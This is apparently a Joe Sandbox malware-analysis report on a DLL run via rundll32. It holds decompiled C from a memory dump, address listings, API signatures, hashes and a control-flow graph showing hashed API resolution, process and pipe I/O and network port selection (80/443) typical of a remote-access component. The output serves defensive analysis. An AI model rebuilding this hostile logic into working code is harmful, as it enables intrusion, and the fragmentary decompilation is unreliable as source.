                  				void* __rbp;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				long long* _t121;
                  				long long* _t122;
                  				long long* _t123;
                  				void* _t151;
                  				void* _t152;
                  				intOrPtr* _t153;
                  				void* _t155;
                  				void* _t158;
                  				long long* _t161;
                  				void* _t163;
                  				void* _t164;
                  				long _t176;
                  				void* _t178;
                  				void* _t181;
                  				void* _t184;
                  
                  				_t123 = __rbx;
                  				 *((long long*)(_t163 + 0x10)) = __rbx;
                  				 *(_t163 + 0x18) = r8d;
                  				_t164 = _t163 - 0x50;
                  				_t119 =  *0x8000d4a0;
                  				_t156 =  *__rcx;
                  				_t153 = __rcx;
                  				r15d = r9d;
                  				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
                  				if (_t119 == _t123) goto 0x80002a78;
                  				_t100 =  *((char*)(_t153 + 0x75)) - 6;
                  				_t5 = _t123 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t100 > 0) goto 0x8000283e;
                  				if (_t100 != 0) goto 0x80002835;
                  				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
                  				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t119 == _t123) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t164 + 0x20)) = 0;
                  				 *_t119();
                  				goto 0x80002874;
                  				_t120 = _t123;
                  				 *((long long*)(_t153 + 0x28)) = _t120;
                  				HeapFree(_t178, _t176, _t152);
                  				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x800028c4;
                  				_t17 = _t164 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t120();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
                  				if (_t120 == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002927;
                  				r9d = r12d;
                  				 *_t120();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t120();
                  				goto 0x80002966;
                  				_t121 = _t123;
                  				 *((long long*)(_t153 + 0x30)) = _t121;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
                  				_t161 = _t121;
                  				if (_t121 == _t123) goto 0x80002a78;
                  				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t121 == _t123) goto 0x800029ed;
                  				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
                  				 *((long long*)(_t164 + 0x28)) = _t123;
                  				 *((long long*)(_t164 + 0x20)) = _t123;
                  				 *_t121();
                  				goto 0x800029f0;
                  				_t122 = _t123;
                  				 *((long long*)(_t153 + 0x38)) = _t122;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x44)) = 4;
                  				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				_t45 = _t161 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t122 == _t123) goto 0x80002a40;
                  				 *_t122();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t122 == _t123) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t122();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}
























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 471 180008368-1800083a8 CreateEventA 472 180008598-18000859e GetLastError 471->472 473 1800083ae-1800083cc call 18000459c 471->473 474 1800085a0-1800085a8 472->474 479 1800083ce-1800083de 473->479 480 1800083e0 473->480 476 1800085aa CloseHandle 474->476 477 1800085b0-1800085b9 474->477 476->477 481 1800083e2-1800083e4 479->481 480->481 481->472 483 1800083ea-1800083ee ResumeThread 481->483 484 1800083f4-180008405 GetExitCodeProcess 483->484 484->472 485 18000840b-180008415 484->485 486 180008593-180008596 485->486 487 18000841b-18000843f PeekNamedPipe 485->487 486->472 486->474 487->472 488 180008445-18000844a 487->488 489 18000844c-18000846d ReadFile 488->489 490 18000848d-18000849e call 18000459c 488->490 489->472 491 180008473-180008487 call 180004258 489->491 496 1800084b3 490->496 497 1800084a0-1800084b1 490->497 491->472 491->490 498 1800084b5-1800084b7 496->498 497->498 498->472 500 1800084bd-1800084c4 498->500 501 1800084c6-1800084e4 WriteFile 500->501 502 1800084ee-18000850a WaitForMultipleObjects 500->502 501->472 503 1800084ea 501->503 502->474 504 180008510-180008513 502->504 503->502 505 180008519-18000852a call 18000459c 504->505 506 1800085ba-1800085bf 504->506 510 180008544 505->510 511 18000852c-180008542 505->511 506->486 508 1800085c1 506->508 508->484 512 180008546-18000854c 510->512 511->512 514 180008581 512->514 515 18000854e-18000856f WriteFile 512->515 518 180008583-180008585 514->518 519 1800085c6-1800085cb 514->519 516 180008571-18000857c ResetEvent 515->516 517 18000858b-180008591 GetLastError 515->517 516->484 517->486 518->484 518->517 519->474
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
                  				void* _v40;
                  				void* _v56;
                  				void* _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				long _t75;
                  				signed long long _t121;
                  				signed long long _t122;
                  				intOrPtr* _t124;
                  				void* _t151;
                  				void* _t158;
                  				void* _t172;
                  
                  				_t162 = __rbp;
                  				_t121 = __rax;
                  				_a24 = __rbx;
                  				_a32 = __rbp;
                  				_t161 =  *0x8000d4a0;
                  				_t124 = __rcx;
                  				r14d = 0;
                  				WaitForSingleObject(??, ??);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x80004372;
                  				 *_t121();
                  				_t151 = __rcx + 0x4c;
                  				r8d = 0x10;
                  				memcpy(??, ??, ??);
                  				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x800043a9;
                  				_t10 = _t151 + 1; // 0x2
                  				_t11 = _t151 + 5; // 0x6
                  				r8d = _t11;
                  				 *_t121();
                  				goto 0x800043ad;
                  				_t122 = _t121 | 0xffffffff;
                  				 *(__rcx + 0x10) = _t122;
                  				if (_t122 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t122 == _t172) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				_a8 = r14w;
                  				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d = _a8 & 0x0000ffff;
                  				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t122, _t124, _t124 + 0x10);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
                  				if (_t122 == _t172) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				_a16 = 0x10;
                  				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x800044f2;
                  				 *_t122();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				SetEvent(??);
                  				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x8000452c;
                  				 *_t122();
                  				goto 0x80004530;
                  				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
                  				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x80004504;
                  				 *_t122();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}















                  0x18000431c
                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x180004381
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x1800044fe
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				struct _CRITICAL_SECTION* _t121;
                  				long long _t124;
                  				intOrPtr* _t150;
                  				struct _CRITICAL_SECTION* _t154;
                  				long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t166;
                  				void* _t168;
                  				signed long long _t177;
                  				struct _CRITICAL_SECTION* _t179;
                  				struct _CRITICAL_SECTION* _t183;
                  				void* _t186;
                  				void* _t189;
                  				void* _t190;
                  
                  				_t177 = __r11;
                  				_t168 = __r8;
                  				_t126 = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rbx;
                  				 *((long long*)(_t165 + 0x18)) = _t161;
                  				 *((long long*)(_t165 + 0x20)) = __rsi;
                  				_t166 = _t165 - 0x60;
                  				_t159 =  *__rcx;
                  				r14d = r8d;
                  				_t190 = __rdx;
                  				_t162 = __rcx;
                  				 *((long long*)(_t166 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
                  				EnterCriticalSection(_t183);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t179);
                  				r11d =  *(_t162 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t162 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
                  				_t77 =  *_t150;
                  				if (_t77 == dil) goto 0x800097aa;
                  				if (_t77 == 0x2f) goto 0x800097a5;
                  				_t78 =  *((intOrPtr*)(_t150 + 1));
                  				if (_t78 != dil) goto 0x80009796;
                  				if (_t78 != dil) goto 0x800097ad;
                  				_t121 = _t154;
                  				if (_t121 == _t154) goto 0x800097c5;
                  				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
                  				if (_t121 == _t154) goto 0x800097e8;
                  				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t121 == _t154) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
                  				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
                  				_t24 = _t166 + 0x50; // 0x32
                  				_t124 = _t24;
                  				 *((long long*)(_t166 + 0x28)) = _t124;
                  				 *((intOrPtr*)(_t166 + 0x20)) = 0;
                  				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
                  				_t187 =  *_t162;
                  				EnterCriticalSection(_t154);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
                  				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t187 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
                  				if (_t124 == _t154) goto 0x8000992e;
                  				_t33 = _t190 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t162 + _t124)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t166 + 0x90) != 0;
                  				 *((intOrPtr*)(_t166 + 0x38)) = 2;
                  				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
                  				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
                  				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
                  				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
